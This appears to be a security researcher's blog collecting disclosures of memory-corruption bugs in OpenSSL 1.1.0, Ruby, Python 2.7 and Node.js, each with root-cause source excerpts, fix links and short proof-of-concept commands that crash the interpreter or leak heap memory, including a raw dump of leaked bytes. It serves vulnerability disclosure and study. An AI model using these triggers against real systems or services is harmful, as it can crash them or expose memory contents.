OpenSSL 1.1.0: remote client memory corruption in ssl_add_clienthello_tlsext()

This requires tickets, requesting certificate status from server, and
a large ALPN list. The most unusual requirement is that the client sets a very large ALPN list. This is very unlikely in a real-world application, and therefore OpenSSL is treating this issue as a bug rather than a vulnerability, and I agree with this assessment. I’m publishing this because I think it’s nonetheless an interesting case.

Modify the server so that it will send a large ticket. What I did was
edit tls_construct_new_session_tickets so that the buffer is large
enough:

3051     if (!BUF_MEM_grow(s->init_buf,
3052                       SSL_HM_HEADER_LENGTH(s) + 6 + sizeof(key_name) +
3053                       EVP_MAX_IV_LENGTH + EVP_MAX_BLOCK_LENGTH +
3054                       EVP_MAX_MD_SIZE + slen + 0xFFFF))
3055         goto err;

adjust ticket size:

3132     p += hlen;
3133     p += 16022;
3134     /* Now write out lengths: p points to end of data written */
3135     /* Total length */

(I added the line with 16022).

Run the server like this:

openssl s_server -alpn 'x'

Run the client like this:

openssl s_client -reconnect -status -alpn `python -c "import sys;
sys.stdout.write('x,'*4000+'x')"`

This should result in a crash.

This is due to an invalid size check in the TLSEXT_STATUSTYPE_ocsp
part of ssl_add_clienthello_tlsext:

1264         if ((long)(limit - ret - 7 - extlen - idlen) < 0)
1265             return NULL;
1266         s2n(TLSEXT_TYPE_status_request, ret);
1267         if (extlen + idlen > 0xFFF0)
1268             return NULL;
1269         s2n(extlen + idlen + 5, ret);
1270         *(ret++) = TLSEXT_STATUSTYPE_ocsp;
1271         s2n(idlen, ret);
1272         for (i = 0; i < sk_OCSP_RESPID_num(s->tlsext_ocsp_ids); i++) {
1273             /* save position of id len */
1274             unsigned char *q = ret;
1275             id = sk_OCSP_RESPID_value(s->tlsext_ocsp_ids, i);
1276             /* skip over id len */
1277             ret += 2;
1278             itmp = i2d_OCSP_RESPID(id, &ret);
1279             /* write id len */
1280             s2n(itmp, q);
1281         }
1282         s2n(extlen, ret);
1283         if (extlen > 0)
1284             i2d_X509_EXTENSIONS(s->tlsext_ocsp_exts, &ret);

s2n (2 bytes), s2n (2 bytes), ret++ (1 byte), s2n (2 bytes) and then the s2n on line 1282 is 9 bytes, but the check on line 1264 checks only for 7 bytes. Using a specially crafted ticket (size) you can ensure that ‘ret’ is 2 bytes PAST ‘limit’ after this routine.

Then in the ALPN writing routine later this happens:

1324     if (s->alpn_client_proto_list && !s->s3->tmp.finish_md_len) {
1325         if ((size_t)(limit - ret) < 6 + s->alpn_client_proto_list_len)
1326             return NULL;

limit – ret is cast to size_t, so instead of -2 it becomes a very large value, and the code execution passes this check.

Then the memcpy a few lines later causes the crash.

It doesn’t crash immediately after ‘ret’ crosses ‘limit’ because the
buffer is over-allocated by the code in crypto/buffer/buffer.c:

 87     /* This limit is sufficient to ensure (len+3)/3*4 < 2**31 */
 88     if (len > LIMIT_BEFORE_EXPANSION) {
 89         BUFerr(BUF_F_BUF_MEM_GROW, ERR_R_MALLOC_FAILURE);
 90         return 0;
 91     }
 92     n = (len + 3) / 3 * 4;

which is why a relatively large ALPN size is required for the crash.

Note that nothing out of the ordinary will happen if the server sends normal-sized tickets.

And just to be clear, you don’t need to modify the source code of the client in order to make this work. You only need to modify the server code (a separate build if you want) so it sends large tickets.

32-bit Ruby arbitrary length OOB read in strscan module

require 'strscan'
x = 'x' * 0x7FFFFFFE
s = StringScanner.new(x)
s.pos = 0x7FFFFFFD
t = s.peek(40000)
t.each_byte do |i|
    if i != 0
        print i.chr
    end
end
$ ./ruby poc.rb | strings
@	;>@V`TdBE
__gmon_start___fini_ITM_deregisterTMCloneTable_ITM_registerTMCloneTable__cxa_finalize_Jv_RegisterClassesonig_region_memsizeonig_region_freeruby_xfreerb_gc_markrb_check_typeddatarb_num2longrb_eRangeErrorrb_raiserb_int2bigrb_eArgErrorrb_string_valuerb_reg_region_copyrb_memerrorrb_data_typed_object_zalloconig_region_initrb_str_newrb_str_dumprb_str_new_staticrb_str_catrb_funcallrb_str_lengthrb_str_appendrb_error_arityrb_warningrb_enc_copyrb_sym2strrb_enc_getonig_name_to_backref_numberrb_eIndexErrorrb_enc_raiseonig_region_clearonig_region_setrb_enc_mbclenrb_check_typerb_reg_prepare_reonig_matchonig_freeonig_searchrb_obj_classrb_sprintfInit_strscanrb_cObjectrb_define_classrb_eStandardErrorrb_define_class_underrb_const_definedrb_obj_freezerb_const_setrb_define_alloc_funcrb_define_private_methodrb_define_singleton_methodrb_define_methodrb_intern2rb_aliaslibpthread.so.0libdl.so.2libcrypt.so.1libm.so.6libc.so.6_edata__bss_start_endGLIBC_2.1.3
@xh[
D$ P
UWVS
[^_]
&WVS
t&WVS
t&VS
'WVS
D$ P
'UWVS
l$8PV
[^_]
'UWVS
[^_]
;|$0|
L$0)
;|$0|
L$0)
'UWVS
l$<P
[^_]
~`9G
[^_]
PjjW
vWVS
PjjW
t&WVS
PjjW
vUWVS
[^_]
vUWVS
|$@P
[^_]
'UWVS
|$<j
[^_]
~$RW
QRQU
&UWVS
|$<j
[^_]
~$RW
RPRPU
UWVS
|$<j
[^_]
~$RW
QRQU
[^_]
UWVS
|$<j
[^_]
~$RW
RPRPU
&UWVS
|$<j
[^_]
~$RW
RPRPU
[^_]
&UWVS
|$<j
[^_]
~$RW
QRQU
'UWVS
|$<j
[^_]
~$RW
QRQU
UWVS
|$<j
[^_]
~$RW
RPRPU
UWVS
|$<j
[^_]
~$RW
RPRPU
UWVS
|$<j
[^_]
~$RW
QRQU
t&VS
t&UWVS
[^_]
vUWVS
[^_]
&UWVS
|$<P
[^_]
'WVS
^j2P
 jPW
 [^_
uninitialized StringScanner objectunscan failed: previous match record not existStringScanner#empty? is obsolete; use #eos? insteadundefined group name reference: %.*sStringScanner#getbyte is obsolete; use #get_byte insteadStringScanner#peep is obsolete; use #peek insteadStringScanner#clear is obsolete; use #terminate insteadStringScanner#restsize is obsolete; use #rest_size instead$Id: strscan.c 53715 2016-02-02 04:39:44Z naruse $index out of range...regexp buffer overflow#<%li
 (uninitialized)>#<%li
 fin>#<%li
 %ld/%ld @ %li
>#<%li
 %ld/%ld %li
 @ %li
>ScanErrorbytesliceStringScanner0.7.0VersionIdinitializeinitialize_copymust_C_versionresetterminateclearstringstring=concat<<pos=charpospointerpointer=skipmatch?checkscan_fullscan_untilskip_untilexist?check_untilsearch_fullgetchget_bytegetbytepeekpeepunscanbeginning_of_line?bol?eos?empty?rest?matched?matchedmatched_size[]pre_matchpost_matchrestrest_sizerestsizeinspect
;*2$"
 pH	`
vGCC: (Debian 4.9.2-10) 4.9.2
,	]_
^8	[
^<	=T
BD	~t
PF		
H	AT
^h	]Q
^ 	{
4$	"
^0	g
^4	o
H	u%
^X	q$
	\	u3
,	]_
^8	[
^<	=T
BD	~t
PF		
H	AT
^h	]Q
^ 	{
4$	"
^0	g
^4	o
H	u%
^X	q$
	\	u3
UU!""
UU#DD
!""l
UU( 

Fixed in git master.

Python 2.7 32-bit heap corruption in JSON encoder

The ascii_escape_str and ascii_escape_unicode functions in Python 2.7 have hitherto been prone to a heap corruption vulnerability. Various paths towards these functions and triggering their the vulnerability exist, one of which is encoding a dict object with a very large key:

python -c 'import json;json.dumps({chr(0x22)*0x2AAAAAAB:0})'

A fix has been implemented: https://hg.python.org/cpython/rev/9375c8834448

Node.js memory corruption from JavaScript as a feature

Update 26 Sept 2016: a fix is being prepared at https://github.com/nodejs/node/issues/8724

As I was casually browsing the NodeJS 6.6.0 source code I stumbled upon this suspect piece of code.

src/node_buffer.cc:

 816 template <typename T, enum Endianness endianness>
 817 void WriteFloatGeneric(const FunctionCallbackInfo<Value>& args) {
 818   Environment* env = Environment::GetCurrent(args);
 819 
 820   bool should_assert = args.Length() < 4;
 821 
 822   if (should_assert) {
 823     THROW_AND_RETURN_UNLESS_BUFFER(env, args[0]);
 824   }
 825 
 826   Local<Uint8Array> ts_obj = args[0].As<Uint8Array>();
 827   ArrayBuffer::Contents ts_obj_c = ts_obj->Buffer()->GetContents();
 828   const size_t ts_obj_offset = ts_obj->ByteOffset();
 829   const size_t ts_obj_length = ts_obj->ByteLength();
 830   char* const ts_obj_data =
 831       static_cast<char*>(ts_obj_c.Data()) + ts_obj_offset;
 832   if (ts_obj_length > 0)
 833     CHECK_NE(ts_obj_data, nullptr);
 834 
 835   T val = args[1]->NumberValue(env->context()).FromMaybe(0);
 836   size_t offset = args[2]->IntegerValue(env->context()).FromMaybe(0);
 837 
 838   size_t memcpy_num = sizeof(T);
 839 
 840   if (should_assert) {
 841     CHECK_NOT_OOB(offset + memcpy_num >= memcpy_num);
 842     CHECK_NOT_OOB(offset + memcpy_num <= ts_obj_length);
 843   }
 844 
 845   if (offset + memcpy_num > ts_obj_length)
 846     memcpy_num = ts_obj_length - offset;
 847 
 848   union NoAlias {
 849     T val;
 850     char bytes[sizeof(T)];
 851   };
 852 
 853   union NoAlias na = { val };
 854   char* ptr = static_cast<char*>(ts_obj_data) + offset;
 855   if (endianness != GetEndianness())
 856     Swizzle(na.bytes, sizeof(na.bytes));
 857   memcpy(ptr, na.bytes, memcpy_num);
 858 }

As you can see, should_assert is set to false when there is a 4th parameter.

This is what the documentation says about it:

https://nodejs.org/api/buffer.html#buffer_buf_writefloatbe_value_offset_noassert

buf.writeFloatBE(value, offset[, noAssert])
#
buf.writeFloatLE(value, offset[, noAssert])
#
Added in: v0.11.15

    value <Number> Number to be written to buf
    offset <Integer> Where to start writing. Must satisfy: 0 <= offset <= buf.length - 4
    noAssert <Boolean> Skip value and offset validation? Default: false
    Return: <Integer> offset plus the number of bytes written

Writes value to buf at the specified offset with specified endian format (writeFloatBE() writes big endian, writeFloatLE() writes little endian). value should be a valid 32-bit float. Behavior is undefined when value is anything other than a 32-bit float.

Setting noAssert to true allows the encoded form of value to extend beyond the end of buf, but the result should be considered undefined behavior.

So it’s not a bug but a feature..

Let’s try it on 64 bit:

node-v6.6.0$ ./node -e 'new Buffer(10).writeFloatBE(1, 0xFFFFFFFFFFFFFFFF-3000, 1);'
Segmentation fault

Groovy!

Disclaimer: I never use NodeJS and I know next to nothing about it. Maybe there is a good use for this “feature” (but what?), but other popular high-level languages have a zero-tolerance policy with regards to raw memory corruption from scripts (see Python, Ruby, Perl, PHP vulnerabilities etc in the Internet Bug Bounty program).

Ruby vulnerability: heap corruption in string.c tr_trans() due to undersized buffer

Response by Ruby team: “severe but usual bug, not a vulnerability.”
Fixed in https://github.com/ruby/ruby/commit/cc9f1e919518edbee41d602ce215175f52f8f5f5

Configure with ASAN AddressSanitizer:

mkdir install; CFLAGS="-fsanitize=address" ./configure
--disable-install-doc --disable-install-rdoc --disable-install-capi
-prefix=`realpath ./install` && make -j4 && make install

Then execute:

$ ./ruby -e '"a".encode("utf-32").tr("b".encode("utf-32"),
"c".encode("utf-32"))'
=================================================================
==17122==ERROR: AddressSanitizer: heap-buffer-overflow on address
0x602000014a98 at pc 0x7ff04065cf01 bp 0x7ffdfe7629b0 sp 0x7ffdfe7629a8
WRITE of size 4 at 0x602000014a98 thread T0
...
...

The actual corruption occurs here:

6196     TERM_FILL(t, rb_enc_mbminlen(enc));

Ruby vulnerability: heap corruption in DateTime.strftime() on 32 bit for certain format strings

Response by Ruby team: “severe but usual bug, not a vulnerability.”
Fixed in https://github.com/ruby/ruby/commit/58e8c9c895cc21473d6e46978666016a6e627d5f

Setting a very high precision in the date_strftime_with_tmx() function,
the following check (in the STRFTIME macro in date_strftime.c) will not
work as expected if s >= 0x80000000.

124         if (start + maxsize < s + precision) {          \
125             errno = ERANGE;                 \
126             return 0;                       \
127         }

This code causes a crash on my 32 bit system:

require 'date'
DateTime.now.strftime("%2147483647c")

64 bit is probably not affected (technically possible, but
unlikely).